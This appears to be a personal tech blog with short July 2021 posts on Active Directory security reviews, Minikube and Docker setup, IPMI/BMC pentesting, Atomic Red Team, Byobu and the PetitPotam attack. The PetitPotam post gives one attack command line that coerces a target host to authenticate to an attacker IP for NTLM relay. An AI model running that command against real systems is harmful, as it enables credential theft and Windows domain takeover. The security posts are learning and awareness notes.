Jul 31, 2021

Trimarc Security Assessment: Securing Active Directory


This is a great presentation that talks about:

  • Active Directory security assessment
    • Identifying AD Security Issues: 8:44 
    • AD Duplicate SPNs: 17:54 
    • AD Admin Account Checks: 20:26 
    • Protected Users: 22:48 
    • Kerberos Delegation Recommendations: 38:00 
    • Tools for Reviewing AD: 50:35 
    • Invoke-TrimarcADChecks: 51:18 
    • Q&A: 53:25

AD security reviews:

  •  User account issues
  • Domain Password policy
  • Tombstone Lifetime & Backups
  • Trusts
  • Duplicate SPNs
  • Group Policy Preference Passwords
  • AD Administration & Privileged Accounts
  • KRGTGT
  • Kerberos Delegation
  • Domain & GPO Permissions
  • Domain Controller Security

 Links:

Jul 30, 2021

Learn K8s with Minikube

Here're the steps that I follow in setting up my Minikube in Ubuntu.


$ sudo apt update && apt upgrade -y

$ sudo apt install virtualbox virtualbox-ext-pack

$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl
$ chmod +x ./kubectl
$ sudo mv ./kubectl /usr/local/bin/kubectl

$ kubectl version --output=yaml

$ curl -Lo minikube https://storage.googleapis.com/minikube/releases/latest/minikube-linux-amd64 && chmod +x minikube && sudo mv minikube /usr/local/bin/

$ minikube version -o json 

$ minikube start --vm-driver=docker

$ kubectl get pods

$ kubectl get nodes

$ kubectl config view

$ kubectl cluster-info

$ minikube ssh 

$ minikube status

$ minikube dashboard

$ minikube dashboard --url

 

Links:

  • https://phoenixnap.com/kb/install-minikube-on-ubuntu

Jul 29, 2021

Docker Learning Guides

Here're a few links for beginner to learn about Docker and Kubernetes. Things like docker, containers, kubernetes, images, registries, pods, replica sets, services deployment, and microservices.

 

Links:

  • https://dev.to/educative/absolute-beginner-s-guide-to-docker-what-is-a-container-lck
  • https://www.educative.io/blog/docker-kubernetes-beginners-guide
  • https://www.educative.io/blog/kubernetes-deployments-pods-services
  • https://www.educative.io/blog/microservices-architecture-tutorial-all-you-need-to-get-started

Jul 28, 2021

Pentesting IPMI and BMC

Recently, I just learned something about BMC and the IPMI protocol.

Baseboard Management Controllers (BMCs) are a type of embedded computer used to provide out-of-band monitoring for desktops and servers. These products are sold under many brand names, including HP iLO, Dell DRAC, Sun ILOM, Fujitsu iRMC, IBM IMM, and Supermicro IPMI. 

BMCs are often implemented as embedded ARM systems, running Linux and connected directly to the southbridge of the host system's motherboard. Network access is obtained either via 'sideband' access to an existing network card or through a dedicated interface. In addition to being built-in to various motherboards, BMCs are also sold as pluggable modules and PCI cards.

Management Interface (IPMI) is a collection of specifications that define communication protocols for talking both across a local bus as well as the network. This specification is managed by Intel and currently comes in two flavors, version 1.5 and version 2.0. 

There is a research, by Dan Farmer, on the security of the IPMI network protocol that uses UDP port 623.

Links:

Jul 27, 2021

Start Your Own Pentest on Cloud and Container with Atomic Red Team

Atomic Red Team is a collection of small, highly portable detection tests mapped to MITRE ATT&CK®. This gives defenders a highly actionable way to immediately start testing their defenses against a broad spectrum of attacks.

MITRE ATT&CK™ offers the security community a common language to communicate about adversary tactics, techniques, and behaviors. In the articles and resources below, we offer guidance on how security teams can use the framework to expand detection coverage and increase visibility.

Links:

  • https://redcanary.com/blog/art-cloud-containers/
  • https://redcanary.com/atomic-red-team/ 
  • https://redcanary.com/mitre-attack/
  • https://github.com/redcanaryco/atomic-red-team/
  • https://attack.mitre.org/resources/updates/


Jul 26, 2021

Byobu

After GNU screen and TMUX, I'm learning how to use Byobu which is a terminal multiplexer and easy to use, Byobu is used to have multiple windows, consoles and split panes within the windows and will also show the status badges and notifications on the terminal.

Unfortunately, it doesn't work well with Putty. Some shortcuts are not working even with some tweaking.

Links:

  • https://www.byobu.org/home
  • https://www.digitalocean.com/community/tutorials/how-to-install-and-use-byobu-for-terminal-management-on-ubuntu-16-04
  • https://www.tutorialspoint.com/how-to-enable-or-install-byobu-for-terminal-management-on-ubuntu-16-04
  • https://codeyarns.com/tech/2013-01-21-byobu-function-keys-do-not-work-in-putty.html
  • https://www.naturalborncoder.com/linux/2014/10/28/getting-started-with-byobu/ 
  • https://superuser.com/questions/651427/function-key-shortcuts-in-putty-mintty-and-tmux-byobu

 

Jul 25, 2021

PetitPotam Atttack

Within a month, after PrintNightmare and HiveNightmare, here come the PetitPotam for Windows administrators.

This is a new exploit that modifies from PrintNightmare, and take advantage of NTLM relay, to exploit a function in Microsoft Encrypting File System Remote Protocol (MS-EFSRPC API) over a network.

The MS-EFSRPC API is enabled by default on all Windows machines, and disabling the MS-EFS service will not prevent this attack from being successful.

A malicious actor could exploit this feature to gain full control of a Microsoft Windows Domain Controller and the entire Windows Domain.

Petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP

 Links:

  • https://github.com/topotam/PetitPotam
  • https://therecord.media/new-petitpotam-attack-forces-windows-hosts-to-share-their-password-hashes/ 
  • https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 
  • https://video.twimg.com/tweet_video/E7AW7-aXEAEmy2X.mp4
  • https://www.bleepingcomputer.com/news/microsoft/new-petitpotam-attack-allows-take-over-of-windows-domains/
  • https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-new-petitpotam-ntlm-relay-attack/
  • https://www.thehacker.recipes/active-directory-domain-services/movement/mitm-and-coerced-authentications/ms-efsr
  • https://www.dataprise.com/resources/blog/windows-server-petitpotam-defense-digest
  • https://securityaffairs.co/wordpress/120489/hacking/windows-petitpotam-attack.html